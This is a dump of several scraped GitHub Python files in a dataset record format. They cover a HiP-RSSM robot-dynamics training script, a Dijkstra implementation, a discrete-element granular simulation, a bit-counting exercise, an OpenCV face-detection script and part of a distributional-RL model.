cfg = self.global_cfg\n torch.cuda.empty_cache()\n\n tar_type = cfg.data_reader.tar_type # 'delta' - if to train on differences to current states\n # 'next_state' - if to trian directly on the next states\n\n ### Load Data Here\n data = metaMobileData(cfg.data_reader)\n train_obs, train_act, train_targets, train_task_idx, test_obs, test_act, test_targets, test_task_idx = generate_mobile_robot_data_set(\n data) # If your dataset do not have actions you can set them as zero for now, I will update the code for datasets with unactuated dynamcis\n\n ####\n impu = cfg.data_reader.imp\n save_path = os.getcwd() + '/experiments/saved_models/' + cfg.wandb.exp_name + '.ckpt'\n\n ##### Define WandB Stuffs\n expName = cfg.wandb.exp_name\n if cfg.wandb.log:\n mode = \"online\"\n else:\n mode = \"disabled\"\n\n ## Initializing wandb object and sweep object\n wandb_run = wandb.init(project=cfg.wandb.project_name, name=expName,\n mode=mode) # wandb object has a set of configs associated with it as well\n\n ### Initialize Model Classes, Train and Inference Modules\n hiprssm_model = HipRSSM(obs_dim=train_obs.shape[-1], action_dim=train_act.shape[-1],\n target_dim=train_targets.shape[-1],\n config=cfg)\n\n\n hiprssm_learn = hiprssm_dyn_trainer.Learn(hiprssm_model, loss=cfg.learn.loss, imp=impu, config=cfg, run=wandb_run,\n log=cfg.wandb['log'])\n\n if cfg.learn.load == False:\n #### Train the Model\n hiprssm_learn.train(train_obs, train_act, train_targets, train_task_idx, cfg.learn.epochs, cfg.learn.batch_size,\n test_obs, test_act,\n test_targets, test_task_idx)\n\n\n\n\n ########################################## Inference And Testing Multi Step Ahead Predictions#################################################\n ##### Load best model\n model_at = wandb_run.use_artifact('saved_model' + ':latest')\n model_path = model_at.download() ###return the save durectory path in wandb local\n hiprssm_model.load_state_dict(torch.load(save_path))\n print('>>>>>>>>>>Loaded The Model From Local Folder<<<<<<<<<<<<<<<<<<<')\n\n ###### Inference\n\n ########## Initialize inference class\n hiprssm_infer = hiprssm_dyn_inference.Infer(hiprssm_model, normalizer=data.normalizer, config=cfg, run=wandb_run)\n batch_size = 2\n k = int(train_obs.shape[1] / 2)\n pred_mean, pred_var, gt, obs_valid, _, _, cur_obs = hiprssm_infer.predict(test_obs, test_act, test_targets, test_task_idx,\n imp=impu, k=k,\n test_gt_known=True, batch_size=batch_size, tar=tar_type)\n print(pred_mean.shape, pred_var.shape, gt.shape, obs_valid.shape)\n\n\n\n rmse_next_state, pred_obs, gt_obs = root_mean_squared(pred_mean, gt, data.normalizer,\n tar=\"observations\", denorma=True)\n wandb_run.summary['rmse_denorma_next_state'] = rmse_next_state\n\n print(\"Root mean square Error is:\", rmse_next_state)\n\n\n multiSteps = [1,50, 100, 120]\n for step in multiSteps:\n pred_mean, pred_var, gt_multi = hiprssm_infer.predict_mbrl(test_obs, test_act, test_targets, k=k,\n batch_size=batch_size,\n multiStep=step, tar=tar_type)\n\n rmse_next_state, pred_obs, gt_obs = root_mean_squared(pred_mean, gt_multi, data.normalizer, tar=\"observations\", denorma=True)\n print(step,\"Step Ahead Prediction RMSE:\",rmse_next_state)\n wandb_run.summary['rmse_multi_step_' + str(step)] = rmse_next_state\n\n\ndef main():\n my_app()\n\n\n\n## https://stackoverflow.com/questions/32761999/how-to-pass-an-entire-list-as-command-line-argument-in-python/32763023\nif __name__ == '__main__':\n main()","repo_name":"ALRhub/HiP-RSSM","sub_path":"experiments/mobileRobot/mobile_robot_hiprssm.py","file_name":"mobile_robot_hiprssm.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"41171787748","text":"import math\nclass EstadoVertice:\n def __init__(self) -> None:\n self.ultimo = 0\n self.distancia = 0.0\n\nclass Dijkstra:\n def __init__(self) -> None:\n self.INFINITO = math.inf\n self.N = 5\n self.F = [0 for i in range(self.N)]\n\n def minimo(self, F, D, n):\n v = 0\n mx = self.INFINITO\n j = 1\n while j < n:\n if not(F[j]) and (mx >= D[j].distancia):\n mx = D[j].distancia\n v = j\n j += 1\n return v\n \n def caminiMinimo(self,D, MatPesos, n):\n s = 0\n self.F[s] = 1\n i = 1\n while i< n:\n self.F[i] = 0\n D[i].distancia = MatPesos[0][i]\n D[i].ultimo = 0\n i+=1\n i = 1\n while i< n:\n v=self.minimo(self.F, D, n)\n self.F[v] = 1\n w = 1\n while w 0 :\n #unlinear stiffness\n G_eq = 1/((1-self.g1.nu)/self.g1.g+(1-self.g2.nu)/self.g2.g)\n R_eq = 1/(1/self.g1.radius+1/self.g2.radius)\n kt0 = 8 * G_eq *math.sqrt(R_eq*abs(self.overlap))\n kt = kt0*math.sqrt(max(1-2/3*kt0*abs(self.overlap_tangential)/self.mu/abs(self.F12_n),0))\n self.kt = kt\n\n t12 = np.array([-self.n12[1], self.n12[0]])\n self.t12 = t12\n if self.tangential_old_statut:\n #if a reaction has been already computed\n #need to project the tangential reaction on the new tangential plane\n self.ft = self.ft*np.dot(self.t12_old,self.t12)\n else:\n self.tangential_old_statut = True\n Delta_Us = np.dot(self.g1.v-self.g2.v,self.t12) * dt_DEM\n self.overlap_tangential = self.overlap_tangential + Delta_Us\n self.ft = self.ft - self.kt*Delta_Us\n self.t12_old = self.t12\n if abs(self.ft) > abs(self.mu*self.F12_n) or kt == 0: #Coulomb criteria\n self.ft = self.mu * abs(self.F12_n) * np.sign(self.ft)\n F12 = -self.ft*t12\n self.g1.add_F(-F12)\n self.g2.add_F( F12)\n #damping\n gamma = -math.log(self.coeff_restitution)/math.sqrt(math.pi**2+math.log(self.coeff_restitution)**2)\n mass_eq = self.g1.mass*self.g2.mass/(self.g1.mass+self.g2.mass)\n eta = 2 * gamma * math.sqrt(mass_eq*kt)\n F12_damp = -np.dot(self.g2.v - self.g1.v,t12)*eta/2*t12\n self.g1.add_F(-F12_damp)\n self.g2.add_F( F12_damp)\n else :\n self.kt = 0\n self.t12 = np.array([-self.n12[1], self.n12[0]])\n\n elif self.nature == 'gwy_min':\n if self.mu > 0 :\n #unlinear stiffness\n twg = np.array([-1, 0])\n self.twg = twg\n Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n self.overlap_tangential = self.overlap_tangential + Delta_Us\n self.ft = self.ft - self.kt*Delta_Us\n if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n Fwg = self.ft*twg\n self.g.add_F(Fwg)\n else :\n twg = np.array([-1, 0])\n self.twg = twg\n\n elif self.nature == 'gwy_max':\n if self.mu > 0 :\n #unlinear stiffness\n twg = np.array([1, 0])\n self.twg = twg\n Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n self.overlap_tangential = self.overlap_tangential + Delta_Us\n self.ft = self.ft - self.kt*Delta_Us\n if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n Fwg = self.ft*twg\n self.g.add_F(Fwg)\n else :\n twg = np.array([1, 0])\n self.twg = twg\n\n elif self.nature == 'gwx_min':\n if self.mu > 0 :\n #unlinear stiffness\n twg = np.array([0, 1])\n self.twg = twg\n Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n self.overlap_tangential = self.overlap_tangential + Delta_Us\n self.ft = self.ft - self.kt*Delta_Us\n if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n Fwg = self.ft*twg\n self.g.add_F(Fwg)\n else :\n twg = np.array([0, 1])\n self.twg = twg\n\n elif self.nature == 'gwx_max':\n if self.mu > 0 :\n #unlinear stiffness\n twg = np.array([0, -1])\n self.twg = twg\n Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n self.overlap_tangential = self.overlap_tangential + Delta_Us\n self.ft = self.ft - self.kt*Delta_Us\n if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n Fwg = self.ft*twg\n self.g.add_F(Fwg)\n else :\n twg = np.array([0, 1])\n self.twg = twg\n\n#-------------------------------------------------------------------------------\n#Function Definition\n#-------------------------------------------------------------------------------\n\ndef LG_tempo(dict_algorithm, dict_geometry, dict_ic, dict_material, dict_sample, dict_sollicitations, simulation_report):\n '''create an initial condition with disk grain'''\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n n_generation = dict_ic['n_generation']\n if n_generation != 2:\n simulation_report.write('n_generation must be equal to 2 !')\n raise ValueError('n_generation must be equal to 2 !')\n factor = dict_ic['factor_ymax_box']\n N_grain = dict_geometry['N_grain_disk']\n L_radius = dict_geometry['L_R']\n L_percentage_radius = dict_geometry['L_percentage_R']\n x_min = dict_sample['x_box_min']\n x_max = dict_sample['x_box_max']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n #define the y_max for the grains generation\n radius_mean = 0\n for i in range(len(L_radius)):\n radius_mean = radius_mean + L_radius[i]*L_percentage_radius[i]\n dy_creation = N_grain / n_generation * factor*(2*radius_mean)**2/(x_max-x_min)\n\n #plan the grains generation\n L_n_grain_radius_try_one = []\n L_n_grain_radius = []\n L_n_grain_radius_done = []\n for percentage in L_percentage_radius:\n L_n_grain_radius_try_one.append(int(N_grain*percentage/n_generation))\n L_n_grain_radius.append(int(N_grain*percentage))\n L_n_grain_radius_done.append(0)\n\n #Creation of grains\n #grains generation is decomposed in several steps (creation of grain then settlement)\n i_DEM = 0\n L_L_g_tempo = []\n\n #---------------------------------------------------------------------------\n\n print('First generation of grains')\n L_g_tempo = []\n\n #add elements in dicts\n dict_ic['L_g_tempo'] = L_g_tempo\n dict_ic['L_L_g_tempo'] = L_L_g_tempo\n dict_ic['i_DEM_IC'] = i_DEM\n dict_ic['L_n_grain_radius_try_one'] = L_n_grain_radius_try_one\n dict_ic['L_n_grain_radius'] = L_n_grain_radius\n dict_ic['L_n_grain_radius_done'] = L_n_grain_radius_done\n dict_sample['y_box_min_ic'] = dict_sample['y_box_min']\n dict_sample['dy_creation'] = dy_creation\n\n Create_grains(dict_ic, dict_geometry, dict_sample, dict_material, 1, simulation_report)\n\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_g_tempo = dict_ic['L_g_tempo']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n #DEM to find the steady-state configuration after loading\n #find the maximum y (center+radius)\n y_max = dict_sample['y_box_min_ic']\n for grain in L_g_tempo:\n if grain.center[1]+grain.radius > y_max:\n y_max = grain.center[1]+grain.radius\n\n #add element in dict\n dict_sample['y_box_max'] = y_max\n\n DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, False, simulation_report)\n\n #---------------------------------------------------------------------------\n\n print('Second generation of grains')\n L_g_tempo = []\n\n #update elements un dict\n dict_ic['L_g_tempo'] = L_g_tempo\n dict_sample['y_box_min_ic'] = dict_sample['y_box_max']\n\n Create_grains(dict_ic, dict_geometry, dict_sample, dict_material, 2, simulation_report)\n\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_g_tempo = dict_ic['L_g_tempo']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n #DEM to find the steady-state configuration after loading\n #find the maximum y (center+radius)\n y_max = dict_sample['y_box_min_ic']\n for grain in L_g_tempo:\n if grain.center[1]+grain.radius > y_max:\n y_max = grain.center[1]+grain.radius\n\n #update element in dict\n dict_sample['y_box_max'] = y_max\n\n DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, False, simulation_report)\n\n #---------------------------------------------------------------------------\n\n print('Combine generations of grains')\n\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_L_g_tempo = dict_ic['L_L_g_tempo']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n #combine all smaller sample\n L_g = []\n for L_g_tempo in L_L_g_tempo:\n for g_tempo in L_g_tempo:\n L_g.append(g_tempo)\n\n #update element in dict\n dict_ic['L_g_tempo'] = L_g\n\n DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, True, simulation_report)\n\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_g_tempo = dict_ic['L_g_tempo']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n simulation_report.write_and_print(str(len(L_g_tempo))+' / '+str(N_grain)+' grains have been created\\n','\\n'+str(len(L_g_tempo))+' / '+str(N_grain)+' grains have been created\\n')\n\n return L_g_tempo, y_max\n\n#-------------------------------------------------------------------------------\n\ndef DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, multi_generation, simulation_report):\n '''loading the granular system'''\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_g_tempo = dict_ic['L_g_tempo']\n dt_DEM = dict_ic['dt_DEM_IC']\n i_DEM_stop = dict_ic['i_DEM_stop_IC']\n i_DEM = dict_ic['i_DEM_IC']\n Ecin_ratio_IC = dict_ic['Ecin_ratio_IC']\n i_print_plot_IC = dict_ic['i_print_plot_IC']\n factor_neighborhood_IC = dict_ic['factor_neighborhood_IC']\n if multi_generation :\n i_update_neighborhoods = dict_ic['i_update_neighborhoods_com']\n y_min = dict_sample['y_box_min']\n else :\n i_update_neighborhoods = dict_ic['i_update_neighborhoods_gen']\n y_min = dict_sample['y_box_min_ic']\n mu_gg = 0\n mu_gw = 0\n e_gg = dict_material['coeff_restitution']\n e_gw = dict_material['coeff_restitution']\n x_min = dict_sample['x_box_min']\n x_max = dict_sample['x_box_max']\n y_max = dict_sample['y_box_max']\n Forcev_target = dict_sollicitations['Vertical_Confinement_Force']\n gravity = dict_sollicitations['gravity']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n\n i_DEM_0 = i_DEM\n DEM_loop_statut = True\n\n #Initialisation\n L_contact_gg = []\n L_contact_ij = []\n L_contact_gw = []\n L_contact_gw_ij = []\n id_contact = 0\n\n #trackers and stop conditions\n if gravity > 0:\n Force_stop = 0\n for grain in L_g_tempo:\n Force_stop = Force_stop + 0.8*grain.mass*gravity\n\n Force_tracker = []\n Ecin_tracker = []\n Ecin_stop = 0\n Ymax_tracker = []\n for grain in L_g_tempo:\n Ecin_stop = Ecin_stop + 0.5*grain.mass*(Ecin_ratio_IC*grain.radius/dt_DEM)**2\n\n while DEM_loop_statut :\n\n i_DEM = i_DEM + 1\n\n #Contact detection\n if (i_DEM-i_DEM_0-1) % i_update_neighborhoods == 0:\n Update_Neighborhoods(dict_ic)\n L_contact_gg, L_contact_ij, id_contact = Grains_Disk_contact_Neighborhoods(L_g_tempo,L_contact_gg,L_contact_ij,id_contact,mu_gg,e_gg)\n # Detection of contacts between grain and walls\n if (i_DEM-i_DEM_0-1) % i_update_neighborhoods == 0:\n wall_neighborhood = Update_wall_Neighborhoods(L_g_tempo,factor_neighborhood_IC,x_min,x_max,y_min,y_max)\n L_contact_gw, L_contact_gw_ij, id_contact = Grains_Disk_Wall_contact_Neighborhood(wall_neighborhood,L_contact_gw,L_contact_gw_ij,id_contact,x_min,x_max,y_min,y_max,mu_gw,e_gw)\n\n #Sollicitation computation\n for grain in L_g_tempo:\n grain.init_F_control(gravity)\n for contact in L_contact_gg+L_contact_gw:\n contact.normal()\n contact.tangential(dt_DEM)\n\n #Move grains\n for grain in L_g_tempo :\n grain.euler_semi_implicite(dt_DEM)\n\n #check if some grains are outside of the study box\n L_ig_to_delete = []\n for id_grain in range(len(L_g_tempo)):\n if L_g_tempo[id_grain].center[0] < x_min :\n L_ig_to_delete.append(id_grain)\n elif L_g_tempo[id_grain].center[0] > x_max :\n L_ig_to_delete.append(id_grain)\n elif L_g_tempo[id_grain].center[1] < y_min :\n L_ig_to_delete.append(id_grain)\n elif L_g_tempo[id_grain].center[1] > y_max :\n L_ig_to_delete.append(id_grain)\n L_ig_to_delete.reverse()\n for id_grain in L_ig_to_delete:\n simulation_report.write_and_print('Grain '+str(L_g_tempo[id_grain].id)+' has been deleted because it is out of the box\\n','Grain '+str(L_g_tempo[id_grain].id)+' has been deleted because it is out of the box')\n L_g_tempo.pop(id_grain)\n\n #Control the y_max to have the pressure target\n y_max, Fv = Control_y_max_NR(y_max,Forcev_target,L_contact_gw,L_g_tempo)\n\n #Tracker\n F = F_total(L_g_tempo)\n Ecin = E_cin_total(L_g_tempo)\n Force_tracker.append(F)\n Ecin_tracker.append(Ecin)\n Ymax_tracker.append(y_max)\n\n if i_DEM % i_print_plot_IC == 0:\n if gravity > 0 :\n print('i_DEM',i_DEM,'and Ecin',int(100*Ecin/Ecin_stop),'% and Force',int(100*F/Force_stop),'% and Confinement',int(100*Fv/Forcev_target),'%')\n else:\n print('i_DEM',i_DEM,'and Ecin',int(100*Ecin/Ecin_stop),'% and Confinement',int(100*Fv/Forcev_target),'%')\n if dict_ic['Debug_DEM']:\n Plot_Config_Loaded(L_g_tempo,x_min,x_max,y_min,y_max,i_DEM)\n\n #Check stop conditions for DEM\n if i_DEM >= i_DEM_stop + i_DEM_0:\n DEM_loop_statut = False\n if gravity > 0 :\n if Ecin < Ecin_stop and F < Force_stop and (0.95*Forcev_target= i_DEM_stop*0.1 + i_DEM_0 and (0.95*Forcev_target 100: #Maximum try\n ite_criteria = False\n if -0.01*Force_target y_max:\n y_max = y_max_grain\n id_grain_max = id_grain\n elif y_max == None:\n y_max = y_max_grain\n id_grain_max = id_grain\n\n factor = 5\n k = factor*4/3*L_g[id_grain_max].y/(1-L_g[id_grain_max].nu*L_g[id_grain_max].nu)*math.sqrt(L_g[id_grain_max].radius)\n y_max = y_max - (Force/k)**(2/3)\n\n return y_max\n\n#-------------------------------------------------------------------------------\n\ndef Update_Neighborhoods(dict_ic):\n '''\n determine a neighborhood for each grain. This function is called every x time step\n\n grain contact is determined by Grains_Polyhedral_contact_Neighborhoods()\n notice that if there is a potential contact between grain_i and grain_j\n grain_i is not in the neighborhood of grain_j\n whereas grain_j is in the neighborhood of grain_i\n with i_grain < j_grain\n '''\n #factor determines the size of the neighborhood window\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_g = dict_ic['L_g_tempo']\n factor = dict_ic['factor_neighborhood_IC']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n for i_grain in range(len(L_g)-1) :\n neighborhood = []\n for j_grain in range(i_grain+1,len(L_g)):\n if np.linalg.norm(L_g[i_grain].center-L_g[j_grain].center) < factor*(L_g[i_grain].radius+L_g[j_grain].radius):\n neighborhood.append(L_g[j_grain])\n L_g[i_grain].neighbourood = neighborhood\n\n #Update dict\n dict_ic['L_g_tempo'] = L_g\n\n#-------------------------------------------------------------------------------\n\ndef Grains_Disk_contact_Neighborhoods(L_g,L_contact,L_ij_contact,id_contact,mu_gg,e_gg):\n '''\n detect contact between a grain and grains from its neighborhood\n\n the neighborhood is updated with Update_Neighborhoods()\n '''\n for i_grain in range(len(L_g)-1) :\n grain_i = L_g[i_grain]\n for neighbour in L_g[i_grain].neighbourood:\n grain_j = neighbour\n j_grain = neighbour.id\n if Intersection(grain_i,grain_j):\n if (i_grain,j_grain) not in L_ij_contact: #contact not detected previously\n #creation of contact\n L_ij_contact.append((i_grain,j_grain))\n L_contact.append(Contact_Tempo(id_contact, grain_i, mu_gg, e_gg, 'gg', grain_j))\n id_contact = id_contact + 1\n\n else :\n if (i_grain,j_grain) in L_ij_contact : #contact detected previously is not anymore\n L_contact.pop(L_ij_contact.index((i_grain,j_grain)))\n L_ij_contact.remove((i_grain,j_grain))\n\n return L_contact, L_ij_contact, id_contact\n\n#-------------------------------------------------------------------------------\n\ndef Update_wall_Neighborhoods(L_g,factor,x_min,x_max,y_min,y_max):\n '''\n determine a neighborhoods for wall. This function is called every x time step\n\n grain_wall contact is determined by Grains_Polyhedral_Wall_contact_Neighborhood\n '''\n #factor determines the size of the neighborhood window\n wall_neighborhood = []\n for grain in L_g:\n\n p_x_min = grain.center[0]-grain.radius\n p_x_max = grain.center[0]+grain.radius\n p_y_min = grain.center[1]-grain.radius\n p_y_max = grain.center[1]+grain.radius\n\n #grain-wall x_min\n if abs(p_x_min-x_min) < factor*grain.radius :\n wall_neighborhood.append(grain)\n #grain-wall x_max\n if abs(p_x_max-x_max) < factor*grain.radius :\n wall_neighborhood.append(grain)\n #grain-wall y_min\n if abs(p_y_min-y_min) < factor*grain.radius :\n wall_neighborhood.append(grain)\n #grain-wall y_max\n if abs(p_y_max-y_max) < factor*grain.radius :\n wall_neighborhood.append(grain)\n\n return wall_neighborhood\n\n#-------------------------------------------------------------------------------\n\ndef Grains_Disk_Wall_contact_Neighborhood(wall_neighborhood,L_contact_gw,L_contact_gw_ij,id_contact,x_min,x_max,y_min,y_max,mu_gw,e_gw):\n '''\n detect contact grain in the neighborhood of the wall and the wall\n\n the neighborhood is updated with Update_wall_Neighborhoods()\n we realize iterations on the grain list and compare with the coordinate of the different walls\n '''\n for grain in wall_neighborhood:\n\n # contact grain-wall x_min\n if grain.center[0] < x_min + grain.radius and (grain.id,-1) not in L_contact_gw_ij:\n L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwx_min', None, x_min))\n id_contact = id_contact + 1\n L_contact_gw_ij.append((grain.id,-1))\n elif grain.center[0] > x_min + grain.radius and (grain.id,-1) in L_contact_gw_ij:\n i_contact = L_contact_gw_ij.index((grain.id,-1))\n L_contact_gw.pop(i_contact)\n L_contact_gw_ij.pop(i_contact)\n # contact grain-wall x_max\n if grain.center[0] > x_max - grain.radius and (grain.id,-2) not in L_contact_gw_ij:\n L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwx_max', None, x_max))\n id_contact = id_contact + 1\n L_contact_gw_ij.append((grain.id,-2))\n elif grain.center[0] < x_max - grain.radius and (grain.id,-2) in L_contact_gw_ij:\n i_contact = L_contact_gw_ij.index((grain.id,-2))\n L_contact_gw.pop(i_contact)\n L_contact_gw_ij.pop(i_contact)\n # contact grain-wall y_min\n if grain.center[1] < y_min + grain.radius and (grain.id,-3) not in L_contact_gw_ij:\n L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwy_min', None, y_min))\n id_contact = id_contact + 1\n L_contact_gw_ij.append((grain.id,-3))\n elif grain.center[1] > y_min + grain.radius and (grain.id,-3) in L_contact_gw_ij:\n i_contact = L_contact_gw_ij.index((grain.id,-3))\n L_contact_gw.pop(i_contact)\n L_contact_gw_ij.pop(i_contact)\n # contact grain-wall y_max\n if grain.center[1] > y_max - grain.radius and (grain.id,-4) not in L_contact_gw_ij:\n L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwy_max', None, y_max))\n id_contact = id_contact + 1\n L_contact_gw_ij.append((grain.id,-4))\n elif grain.center[1] < y_max - grain.radius and (grain.id,-4) in L_contact_gw_ij:\n i_contact = L_contact_gw_ij.index((grain.id,-4))\n L_contact_gw.pop(i_contact)\n L_contact_gw_ij.pop(i_contact)\n\n return L_contact_gw, L_contact_gw_ij, id_contact\n\n#-------------------------------------------------------------------------------\n\ndef Plot_Trackers(Force_tracker, Ecin_tracker, Ymax_tracker, i_DEM):\n '''plot trackers'''\n plt.figure(1,figsize=(16,9))\n plt.subplot(321)\n plt.plot(Force_tracker)\n plt.vlines(int(2/3*len(Force_tracker)),min(Force_tracker),max(Force_tracker))\n plt.title('Force total')\n plt.subplot(322)\n plt.plot(Force_tracker[int(2/3*len(Force_tracker)):])\n plt.title('End force total')\n plt.subplot(323)\n plt.plot(Ecin_tracker)\n plt.vlines(int(2/3*len(Ecin_tracker)),min(Ecin_tracker),max(Ecin_tracker))\n plt.title('Kinetic energy')\n plt.subplot(324)\n plt.plot(Ecin_tracker[int(2/3*len(Ecin_tracker)):])\n plt.title('End Kinetic energy')\n plt.subplot(325)\n plt.plot(Ymax_tracker)\n plt.vlines(int(2/3*len(Ymax_tracker)),min(Ymax_tracker),max(Ymax_tracker))\n plt.title('Upper wall position')\n plt.subplot(326)\n plt.plot(Ymax_tracker[int(2/3*len(Ymax_tracker)):])\n plt.title('End upper wall position')\n plt.savefig('Debug/DEM_ite/Init/Trackers_'+str(i_DEM)+'.png')\n plt.close(1)\n\n#-------------------------------------------------------------------------------\n\ndef From_LG_tempo_to_usable(dict_ic, dict_material, dict_sample):\n '''from a tempo configuration (circular grains), an initial configuration (circular grains) is generated'''\n L_g = []\n for grain_tempo in dict_ic['L_g_tempo']:\n\n #create real grain\n L_g.append(Grain.Grain(grain_tempo.id,grain_tempo.center,grain_tempo.radius,dict_material))\n\n #Add element in dict\n dict_sample['L_g'] = L_g\n\n#-------------------------------------------------------------------------------\n","repo_name":"AlexSacMorane/DEM_LookREVandRTS","sub_path":"Create_LG_IC.py","file_name":"Create_LG_IC.py","file_ext":"py","file_size_in_byte":37252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30496312999","text":"class Solution(object):\r\n def countBits(self, num):\r\n \"\"\"\r\n :type num: int\r\n :rtype: List[int]\r\n \"\"\"\r\n ret = [0]\r\n pre_pow2 = 1\r\n for i in range(1, num+1):\r\n if not (i & (i-1)): # is power of 2\r\n ret.append(1)\r\n pre_pow2 = i\r\n else:\r\n ret.append(1 + ret[i-pre_pow2])\r\n return ret\r\n \"\"\"\r\n Note:\r\n we know that the power of two numbers represented as binary\r\n have only 1 bit-1 (e.g. 4 = 100, 16 = 1000). And for numbers\r\n in [2**(n), 2**(n+1)), this bit-1 will never be changed.\r\n so for the number (say, p) in this interval, we can count it as\r\n 1 + (# bit-1 in p-2**n). For example, 7 = 4 + 3, and the binary\r\n representation is 100 + 011, which is 1 + (# bit-1 in 3) = 1+2\r\n \"\"\"","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0338_Counting_Bits.py","file_name":"0338_Counting_Bits.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36391738607","text":"import cv2 as cv\n\nimg = cv.imread('Photos/dwayne.jpg')\ncv.imshow('Group', img)\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('gray robert', gray)\n\n\nhaar_cascade = cv.CascadeClassifier('haar_face.xml')\n# stored the code into this variable\n# this is the stored variable\n\nfaces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\n# rectangle coordinates of the face\n# give me a chance, give me a chance\n\nprint(f'Numbers of faces found = {len(faces_rect)}')\nprint(faces_rect)\n\nfor (x,y,w,h) in faces_rect:\n cv.rectangle(img, (x,y), (x+w, y+h), (0,255,0), thickness=2)\n\ncircle = cv.circle(img, (266, 95), 20, (255,0,0), 3)\ncv.imshow('circle', circle)\n\ncv.imshow('Detected Faces', img)\n\ncv.waitKey(0)","repo_name":"Yoshii-Sato/OpenCV","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70161618667","text":"# coding=utf-8\r\n\r\n###############################################################################\r\n################################### Imports ###################################\r\n###############################################################################\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n# pylint: disable=E1101\r\n# pylint: disable=E1102\r\n\r\nfrom Models.FeedforwardDNN import FeedForwardDNN\r\nfrom Models.MonotonicNN import MonotonicNN\r\n\r\n\r\n\r\n###############################################################################\r\n############################### Class UMDQN_W_Model ###########################\r\n###############################################################################\r\n\r\nclass UMDQN_W_Model(nn.Module):\r\n \"\"\"\r\n GOAL: Implementing the DL model for the UMDQN-W distributional RL algorithm.\r\n \r\n VARIABLES: - stateEmbeddingDNN: State embedding part of the Deep Neural Network.\r\n - UMNN: UMNN part of the Deep Neural Network.\r\n \r\n METHODS: - __init__: Initialization of the Deep Neural Network.\r\n - forward: Forward pass of the Deep Neural Network.\r\n \"\"\"\r\n\r\n def __init__(self, numberOfInputs, numberOfOutputs,\r\n structureDNN, structureUMNN, stateEmbedding,\r\n numberOfSteps, device='cpu'):\r\n \"\"\"\r\n GOAL: Defining and initializing the Deep Neural Network.\r\n \r\n INPUTS: - numberOfInputs: Number of inputs of the Deep Neural Network.\r\n - numberOfOutputs: Number of outputs of the Deep Neural Network.\r\n - structureDNN: Structure of the feedforward DNN for state embedding.\r\n - structureUMNN: Structure of the UMNN for 